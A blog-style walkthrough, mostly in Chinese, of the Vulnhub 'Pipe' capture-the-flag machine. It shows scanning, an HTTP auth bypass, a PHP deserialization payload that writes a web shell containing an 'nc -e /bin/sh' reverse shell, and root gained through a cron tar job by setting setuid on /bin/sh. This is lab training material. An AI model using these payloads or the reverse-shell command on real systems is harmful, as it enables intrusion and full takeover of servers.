/dev/random: Pipe from Vulnhub
root@kali:~/Security/pipe# nmap 192.168.0.118 -p- -T5 -n
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-21 04:55 CST
Warning: 192.168.0.118 giving up on port because retransmission cap hit (2).
Nmap scan report for 192.168.0.118
Host is up (0.00019s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
35856/tcp open unknown
MAC Address: 08:00:27:D7:0B:8C (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 513.72 secondsnmap掃出了四個開啟的port,先來看一下port 80
……第一次遇到首頁就要輸入帳號密碼的
35856不知道做甚麼用的,再深入掃瞄試試
root@kali:~/Security/pipe# nmap 192.168.0.118 -p 22,80,111,35856 -A -O
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 16:48:50:89:e7:c9:1f:90:ff:15:d8:3e:ce:ea:53:8f (DSA)
| 2048 ca:f9:85:be:d7:36:47:51:4f:e6:27:84:72:eb:e8:18 (RSA)
|_ 256 d8:47:a0:87:84:b2:eb:f5:be:fc:1c:f1:c9:7f:e3:52 (ECDSA)
80/tcp open http Apache httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Basic realm=index.php
|_http-methods: No Allow or Public header in OPTIONS response (status code 401)
|_http-server-header: Apache
|_http-title: 401 Unauthorized
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35856/tcp status
|_ 100024 1 44438/udp status
35856/tcp open status 1 (RPC #100024)結果是rpc對應的port。
在不知道能做甚麼的情況下,只好回到網頁的部分亂試一通
最後試到只要在request method的部分不要用GET就能繞過認證了
接著檢視一下程式碼
<script src="scriptz/php.js"></script>
<script>
function submit_form() {
var object = serialize({id: 1, firstname: 'Rene', surname: 'Margitte', artwork: 'The Treachery of Images'});
object = object.substr(object.indexOf("{"),object.length);
object = "O:4:\"Info\":4:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
...
<form action="index.php" id="info_form" method="POST">
<input type="hidden" name="param" value="" />
<a href="#" onclick="submit_form(); return false;">Show Artist Info.</a>
</form></center></html>scriptz目錄是開放的,從裡面獲得另一個檔案”log.php.BAK”
這個class會在destruct的時候將data的內容寫入filename
<?php
class Log
{
public $filename = '';
public $data = '';
public function __construct()
{
$this->filename = '';
$this->data = '';
}
public function PrintLog()
{
$pre = "[LOG]";
$now = date('Y-m-d H:i:s');
$str = '$pre - $now - $this->data';
eval("\$str = \"$str\";");
echo $str;
}
public function __destruct()
{
file_put_contents($this->filename, $this->data, FILE_APPEND);
}
}
?>按下頁面下方的Show Artist Info之後,瀏覽器會POST一些經過serialize處理後的資訊到index.php
param=O:4:"Info":4:{s:2:"id";i:1;s:9:"firstname";s:4:"Rene";s:7:"surname";s:8:"Margitte";s:7:"artwork";s:23:"The+Treachery+of+Images";}serialize的做法在php.js
// example 1: serialize(['Kevin', 'van', 'Zonneveld']);
// returns 1: 'a:3:{i:0;s:5:"Kevin";i:1;s:3:"van";i:2;s:9:"Zonneveld";}'
// example 2: serialize({firstName: 'Kevin', midName: 'van', surName: 'Zonneveld'});
// returns 2: 'a:3:{s:9:"firstName";s:5:"Kevin";s:7:"midName";s:3:"van";s:7:"surName";s:9:"Zonneveld";}'接著將submit_form()的內容改成要送出的資訊
選擇送到scriptz是因為可以直接進到scriptz的目錄確認有沒有寫入成功
而data的內容看起來也是成功寫入yo.php了
再來就試試看能不能送個reverse shell回來
直接修改html的內容
<script>
function submit_form() {
var object = serialize({filename: '/var/www/html/scriptz/shell.php', data: '<?php passthru("nc -e /bin/sh 192.168.0.115 22234"); ?>'});
object = object.substr(object.indexOf("{"),object.length);
object = "O:3:\"Log\":2:" + object;
document.forms[0].param.value = object;
document.getElementById('info_form').submit();
}
</script>連上 http://192.168.0.117/scriptz/shell.php 之後瀏覽器就卡住了
root@kali:~/Security/pipe# nc -lp 22234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux pipe 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24) x86_64 GNU/Linuxshell GET!
簡單地蒐集資訊之後,找到一個使用者 rene ,而且他的家目錄沒有擋權限
ls -al
total 208
drwxrwxrwx 2 rene rene 4096 Dec 23 05:04 .
drwxr-xr-x 3 rene rene 4096 Jul 6 07:42 ..
-rw-r--r-- 1 rene rene 124078 Dec 23 05:00 backup.tar.gz
-rw-r--r-- 1 rene rene 26558 Dec 23 05:02 sys-12512.BAK
-rw-r--r-- 1 rene rene 11402 Dec 23 05:01 sys-23924.BAK
-rw-r--r-- 1 rene rene 7231 Dec 23 05:04 sys-2448.BAK
-rw-r--r-- 1 rene rene 27182 Dec 23 05:03 sys-5018.BAKbackup目錄看起來每隔一分鐘就會生出一個檔案,每五分鐘就會打包一包backup.tar.gz
推測是有在跑cron,剛好/etc/crontab也可以讀取,就來看看cron的設定
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root /root/create_backup.sh
*/5 * * * * root /usr/bin/compress.sh只能看到/usr/bin/compress.sh的內容
cat compress.sh
#!/bin/sh
rm -f /home/rene/backup/backup.tar.gz
cd /home/rene/backup
tar cfz /home/rene/backup/backup.tar.gz *
chown rene:rene /home/rene/backup/backup.tar.gz
rm -f /home/rene/backup/*.BAK這邊PATH的設定方式沒辦法達到替換指令的效果
於是直接給/bin/sh加上了stickybit
echo "chmod u+s /bin/sh" > shell.sh等時間一到就可以拿到root的權限了
# sh
sh
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
# cat /root/flag.txt
cat /root/flag.txt
.aMMMMMMMMn. ,aMMMMn.
.aMccccccccc*YMMn. `Mb
aMccccccccccccccc*Mn MP
.AMMMMn. MM `*YMMY*ccaM*
dM* *YMMb YP `cMY
YM. .dMMP aMn. .cMP
*YMMn. aMMMMMMMMMMMY'
.'YMMb. ccMP
.dMcccccc*Mc....cMb.cMP'
.dMMMMb;cccc*Mbcccc,IMMMMMMMn.
dY*' '*M;ccccMM..dMMM..MP*cc*Mb
YM. ,MbccMMMMMMMMMMMM*cccc;MP
*Mbn;adMMMMMMMMMMMMMMMIcccc;M*
dPcccccIMMMMMMMMMMMMMMMMa;c;MP
Yb;cc;dMMMMMMMMMMMP*' *YMMP*
*YMMMPYMMMMMMP*' curchack
+####################################+
|====== | |
|====== | |
|====== | |
|====== | |
|====== | |
+----------------------------------+-+
####################################
|====== |
|====== |
|===== |
|==== |
| |
+ +
.d8888b. d8b d8b 888 d8b
d88P Y88b Y8P 88P 888 Y8P
888 888 8P 888
888 .d88b. .d8888b888 88888b." .d88b. .d8888b 888888 88888b. 8888b. .d8888b 888 88888888b. .d88b. 88888b. 88888888b. .d88b.
888 d8P Y8bd88P" 888 888 "88b d8P Y8b88K 888 888 "88b "88b88K 888 888888 "88bd8P Y8b 888 "88b888888 "88bd8P Y8b
888 88888888888888 888 888 888 88888888"Y8888b.888 888 888.d888888"Y8888b. 888 888888 88888888888 888 888888888 88888888888
Y88b d88PY8b. Y88b. 888 888 888 Y8b. X88Y88b. 888 d88P888 888 X88 Y88b 888888 888Y8b. 888 d88P888888 d88PY8b. d8b
"Y8888P" "Y8888 "Y8888P888 888 888 "Y8888 88888P' "Y888 88888P" "Y888888 88888P' "Y88888888 888 "Y8888 88888P" 88888888P" "Y8888Y8P
888 888 888
888 888 888
888 888 888
Well Done!
Here's your flag: 0089cd4f9ae79402cdd4e7b8931892b7